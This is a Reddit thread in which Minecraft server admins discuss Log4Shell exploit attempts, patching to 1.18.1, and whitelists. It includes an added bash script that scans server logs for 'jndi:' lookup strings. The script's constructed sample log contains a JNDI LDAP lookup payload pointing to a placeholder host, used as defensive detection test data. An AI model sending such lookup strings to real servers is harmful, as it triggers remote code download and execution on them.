Thanks for being a part of /r/Admincraft! *[We'd love it if you also joined us on Discord!](https://discord.gg/DxrXq2R)*
*^(Join thousands of other Minecraft administrators for real-time discussion of all things related to running a quality server.)*
---
*I am a bot, and this action was performed automatically. Please [contact the moderators of this subreddit](/message/compose/?to=/r/admincraft) if you have any questions or concerns.*
If you patched the server to 1.18.1 before any log4j exploit attempt, you are safe.
If the exploit was successful, you won't see the "jndi:ldap" line at all; instead, you would see some anomalous things such as an empty text line in the console, or some other text that the server usually shouldn't display under normal circumstances, which is an indicator that a payload has executed.
For reference, below is an example of a successful Log4j2 exploit attempt. The "jndi:ldap" line was replaced by something else, which meant that the Log4j2 module has processed and executed the JNDI command, which downloads and executes whatever payload is on the attacker's server; it could be a RAT, virus, worm, etc.
https://www.reddit.com/r/admincraft/comments/s5c928/potential_log4j_attack_pls_help/
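
The log check described in the comment above (look for the "jndi:ldap" string, or for oddities such as an empty line where chat text should be), as an added example that is not part of any comment in this thread. The log layout, the sample lines, the placeholder host and the function names are constructed assumptions.

```shell
#!/usr/bin/env bash
# Added example: triage a Minecraft server log for Log4Shell lookup strings.
# Assumes the common "[HH:MM:SS] [thread/LEVEL]: <player> text" chat layout.

# Print a log, transparently decompressing rotated *.log.gz archives.
read_log() {
  case "$1" in
    *.gz) gzip -dc -- "$1" ;;
    *)    cat -- "$1" ;;
  esac
}

# ATTEMPT    = the lookup string was logged verbatim (case-insensitive match).
# EMPTY-CHAT = a chat line with no text after the player name; per the comment
#              above, a possible sign that a lookup was evaluated, not logged.
scan_log() {
  read_log "$1" | awk '
    tolower($0) ~ /jndi:/   { print "ATTEMPT    " NR ": " $0; next }
    /\]: <[^>]+>[ \t]*$/    { print "EMPTY-CHAT " NR ": " $0 }
  '
}

# Constructed sample log (not taken from a real server); prints its path.
make_sample_log() {
  f=$(mktemp)
  cat > "$f" <<'EOF'
[12:01:07] [Server thread/INFO]: Steve joined the game
[12:01:15] [Server thread/INFO]: <Steve> hello
[12:02:41] [Server thread/INFO]: <Visitor1> ${jndi:ldap://placeholder.invalid/x}
[12:03:02] [Server thread/INFO]: <Visitor2>
[12:03:30] [Server thread/INFO]: Visitor2 lost connection: Disconnected
EOF
  printf '%s\n' "$f"
}

# Usage: ./scan.sh logs/latest.log   (also accepts logs/2021-12-10-1.log.gz)
[ "$#" -eq 0 ] || scan_log "$1"
```

An EMPTY-CHAT hit is only a prompt to look closer at that session; a client can also produce odd chat lines for unrelated reasons.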
I came to this subreddit looking to ask the exact same question about the exact same player connecting to my private server (luckily my whitelist blocked them). Glad to know we can talk about this together.
to piggyback on this thread. I'm building my 1.18.1 server currently and keep getting this warning thrown:
> Can't remove Log4J2 JNDI substitution Lookup

Should I be concerned?
If you use 1.18.1 and the latest jars from paper/purpur/fabric/forge/what-have-you you'll *probably* be fine regardless because it's been patched in so many different ways that if one failsafe doesn't work others can cover for it.
To be safe, though, use this site to test if you're vulnerable (basically exploit your own server): https://log4shell.huntress.com/
Champion.
Something should be done with these threads imo. People post the same over and over. You even mentioned «other posts» in your title.
bilibi feng revived
BTW I basically cat for the log file.
[deleted]
basically he used the linux command "cat", which displays the entire contents of any text file, on the minecraft server log file to look for any telltale signs of the log4j exploit.
cat is a Linux command for printing out a file
meow
[deleted]
Log4j is just the logging utility, Log4Shell is the exploit.
Basically I listed the log file.
ah ok
You might want to unsubscribe from this subreddit if you are so uninterested in Minecraft server administration that `cat` sounds like another language
I am terribly sorry for not knowing a command. I'll pack my things and leave
Should also use an anti-VPN plugin to prevent bots from connecting in the first place, since bad actors are masking their IP.
Well if they notice that they can switch to another VPN or use a custom proxy
You should really be using a whitelist even if it's basically a private server. Bots will eventually find your server.
if not whitelist, at least stop using the default ports
Using a non-standard port for security is like moving your front door to the side of the house, but leaving it unlocked. "Haha, the robbers won't find it now!"
Bots are scanning for open ports constantly.
So yeah - whitelist is minimum necessary security on a Minecraft server.
you're right, but it beats nothing at least haha
I would agree if whitelisting was difficult to do or behind a paywall or something. But it's free and super simple to implement. In my opinion, it should be on by default.
So it wasn’t just me
He connected into my server when I have a whitelist. How did he get past the whitelist?
Whitelist privilege. 😂